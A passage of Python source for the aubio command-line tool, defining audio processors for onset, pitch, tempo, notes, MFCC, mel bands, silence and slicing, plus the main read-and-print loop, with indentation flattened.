if 'time_format' in args:
self.time2string = timefunc(args.time_format)
if args.verbose > 2 and hasattr(self, 'options'):
name = type(self).__name__.split('_')[1]
optstr = ' '.join(['running', name, 'with options', repr(self.options), '\n'])
sys.stderr.write(optstr)
def flush(self, frames_read, samplerate):
# optionally called at the end of process
pass
def parse_options(self, args, valid_opts):
# get any valid options found in a dictionnary of arguments
options = {k :v for k,v in vars(args).items() if k in valid_opts}
self.options = options
def remap_pvoc_options(self, options):
# FIXME: we need to remap buf_size to win_s, hop_size to hop_s
# adjust python/ext/py-phasevoc.c to understand buf_size/hop_size
if 'buf_size' in options:
options['win_s'] = options['buf_size']
del options['buf_size']
if 'hop_size' in options:
options['hop_s'] = options['hop_size']
del options['hop_size']
self.options = options
class process_onset(default_process):
valid_opts = ['method', 'hop_size', 'buf_size', 'samplerate']
def __init__(self, args):
self.parse_options(args, self.valid_opts)
self.onset = aubio.onset(**self.options)
if args.threshold is not None:
self.onset.set_threshold(args.threshold)
if args.minioi:
if args.minioi.endswith('ms'):
self.onset.set_minioi_ms(float(args.minioi[:-2]))
elif args.minioi.endswith('s'):
self.onset.set_minioi_s(float(args.minioi[:-1]))
else:
self.onset.set_minioi(int(args.minioi))
if args.silence:
self.onset.set_silence(args.silence)
super(process_onset, self).__init__(args)
def __call__(self, block):
return self.onset(block)
def repr_res(self, res, _frames_read, samplerate):
if res[0] != 0:
outstr = self.time2string(self.onset.get_last(), samplerate)
sys.stdout.write(outstr + '\n')
class process_pitch(default_process):
valid_opts = ['method', 'hop_size', 'buf_size', 'samplerate']
def __init__(self, args):
self.parse_options(args, self.valid_opts)
self.pitch = aubio.pitch(**self.options)
if args.pitch_unit is not None:
self.pitch.set_unit(args.pitch_unit)
if args.threshold is not None:
self.pitch.set_tolerance(args.threshold)
if args.silence is not None:
self.pitch.set_silence(args.silence)
super(process_pitch, self).__init__(args)
def __call__(self, block):
return self.pitch(block)
def repr_res(self, res, frames_read, samplerate):
fmt_out = self.time2string(frames_read, samplerate)
sys.stdout.write(fmt_out + "%.6f\n" % res[0])
class process_beat(default_process):
valid_opts = ['method', 'hop_size', 'buf_size', 'samplerate']
def __init__(self, args):
self.parse_options(args, self.valid_opts)
self.tempo = aubio.tempo(**self.options)
super(process_beat, self).__init__(args)
def __call__(self, block):
return self.tempo(block)
def repr_res(self, res, _frames_read, samplerate):
if res[0] != 0:
outstr = self.time2string(self.tempo.get_last(), samplerate)
sys.stdout.write(outstr + '\n')
class process_tempo(process_beat):
def __init__(self, args):
super(process_tempo, self).__init__(args)
self.beat_locations = []
def repr_res(self, res, _frames_read, samplerate):
if res[0] != 0:
self.beat_locations.append(self.tempo.get_last_s())
def flush(self, frames_read, samplerate):
import numpy as np
if len(self.beat_locations) < 2:
outstr = "unknown bpm"
else:
bpms = 60./ np.diff(self.beat_locations)
median_bpm = np.mean(bpms)
if len(self.beat_locations) < 10:
outstr = "%.2f bpm (uncertain)" % median_bpm
else:
outstr = "%.2f bpm" % median_bpm
sys.stdout.write(outstr + '\n')
class process_notes(default_process):
valid_opts = ['method', 'hop_size', 'buf_size', 'samplerate']
def __init__(self, args):
self.parse_options(args, self.valid_opts)
self.notes = aubio.notes(**self.options)
super(process_notes, self).__init__(args)
def __call__(self, block):
return self.notes(block)
def repr_res(self, res, frames_read, samplerate):
if res[2] != 0: # note off
fmt_out = self.time2string(frames_read, samplerate)
sys.stdout.write(fmt_out + '\n')
if res[0] != 0: # note on
lastmidi = res[0]
fmt_out = "%f\t" % lastmidi
fmt_out += self.time2string(frames_read, samplerate)
sys.stdout.write(fmt_out) # + '\t')
def flush(self, frames_read, samplerate):
eof = self.time2string(frames_read, samplerate)
sys.stdout.write(eof + '\n')
class process_mfcc(default_process):
def __init__(self, args):
valid_opts1 = ['hop_size', 'buf_size']
self.parse_options(args, valid_opts1)
self.remap_pvoc_options(self.options)
self.pv = aubio.pvoc(**self.options)
valid_opts2 = ['buf_size', 'n_filters', 'n_coeffs', 'samplerate']
self.parse_options(args, valid_opts2)
self.mfcc = aubio.mfcc(**self.options)
# remember all options
self.parse_options(args, list(set(valid_opts1 + valid_opts2)))
super(process_mfcc, self).__init__(args)
def __call__(self, block):
fftgrain = self.pv(block)
return self.mfcc(fftgrain)
def repr_res(self, res, frames_read, samplerate):
fmt_out = self.time2string(frames_read, samplerate)
fmt_out += ' '.join(["% 9.7f" % f for f in res.tolist()])
sys.stdout.write(fmt_out + '\n')
class process_melbands(default_process):
def __init__(self, args):
self.args = args
valid_opts = ['hop_size', 'buf_size']
self.parse_options(args, valid_opts)
self.remap_pvoc_options(self.options)
self.pv = aubio.pvoc(**self.options)
valid_opts = ['buf_size', 'n_filters']
self.parse_options(args, valid_opts)
self.remap_pvoc_options(self.options)
self.filterbank = aubio.filterbank(**self.options)
self.filterbank.set_mel_coeffs_slaney(args.samplerate)
super(process_melbands, self).__init__(args)
def __call__(self, block):
fftgrain = self.pv(block)
return self.filterbank(fftgrain)
def repr_res(self, res, frames_read, samplerate):
fmt_out = self.time2string(frames_read, samplerate)
fmt_out += ' '.join(["% 9.7f" % f for f in res.tolist()])
sys.stdout.write(fmt_out + '\n')
class process_quiet(default_process):
def __init__(self, args):
self.args = args
valid_opts = ['hop_size', 'silence']
self.parse_options(args, valid_opts)
self.wassilence = 1
if args.silence is not None:
self.silence = args.silence
super(process_quiet, self).__init__(args)
def __call__(self, block):
if aubio.silence_detection(block, self.silence) == 1:
if self.wassilence != 1:
self.wassilence = 1
return 2 # newly found silence
return 1 # silence again
else:
if self.wassilence != 0:
self.wassilence = 0
return -1 # newly found noise
return 0 # noise again
def repr_res(self, res, frames_read, samplerate):
fmt_out = None
if res == -1:
fmt_out = "NOISY: "
if res == 2:
fmt_out = "QUIET: "
if fmt_out is not None:
fmt_out += self.time2string(frames_read, samplerate)
sys.stdout.write(fmt_out + '\n')
class process_cut(process_onset):
def __init__(self, args):
super(process_cut, self).__init__(args)
self.slices = []
self.options = args
def __call__(self, block):
ret = super(process_cut, self).__call__(block)
if ret: self.slices.append(self.onset.get_last())
return ret
def flush(self, frames_read, samplerate):
from aubio.cut import _cut_slice
_cut_slice(self.options, self.slices)
duration = float (frames_read) / float(samplerate)
base_info = '%(source_file)s' % {'source_file': self.options.source_uri}
base_info += ' (total %(duration).2fs at %(samplerate)dHz)\n' % \
{'duration': duration, 'samplerate': samplerate}
info = "created %d slices from " % len(self.slices)
info += base_info
sys.stderr.write(info)
def main():
parser = aubio_parser()
args = parser.parse_args()
if 'show_version' in args and args.show_version:
sys.stdout.write('aubio version ' + aubio.version + '\n')
sys.exit(0)
elif 'verbose' in args and args.verbose > 3:
sys.stderr.write('aubio version ' + aubio.version + '\n')
if 'command' not in args or args.command is None or args.command in ['help']:
# no command given, print help and return 1
parser.print_help()
if args.command and args.command in ['help']:
sys.exit(0)
else:
sys.exit(1)
elif not args.source_uri and not args.source_uri2:
sys.stderr.write("Error: a source is required\n")
parser.print_help()
sys.exit(1)
elif args.source_uri2 is not None:
args.source_uri = args.source_uri2
try:
# open source_uri
with aubio.source(args.source_uri, hop_size=args.hop_size,
samplerate=args.samplerate) as a_source:
# always update args.samplerate to native samplerate, in case
# source was opened with args.samplerate=0
args.samplerate = a_source.samplerate
# create the processor for this subcommand
processor = args.process(args)
frames_read = 0
while True:
# read new block from source
block, read = a_source()
# execute processor on this block
res = processor(block)
# print results for this block
if args.verbose > 0:
processor.repr_res(res, frames_read, a_source.samplerate)
# increment total number of frames read
frames_read += read
# exit loop at end of file
if read < a_source.hop_size: break
# flush the processor if needed
processor.flush(frames_read, a_source.samplerate)
if args.verbose > 1:
fmt_string = "read {:.2f}s"
fmt_string += " ({:d} samples in {:d} blocks of {:d})"
fmt_string += " from {:s} at {:d}Hz\n"
sys.stderr.write(fmt_string.format(
frames_read/float(a_source.samplerate),
frames_read,
frames_read // a_source.hop_size + 1,
a_source.hop_size,
a_source.uri,
a_source.samplerate))
except KeyboardInterrupt:
sys.exit(1)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.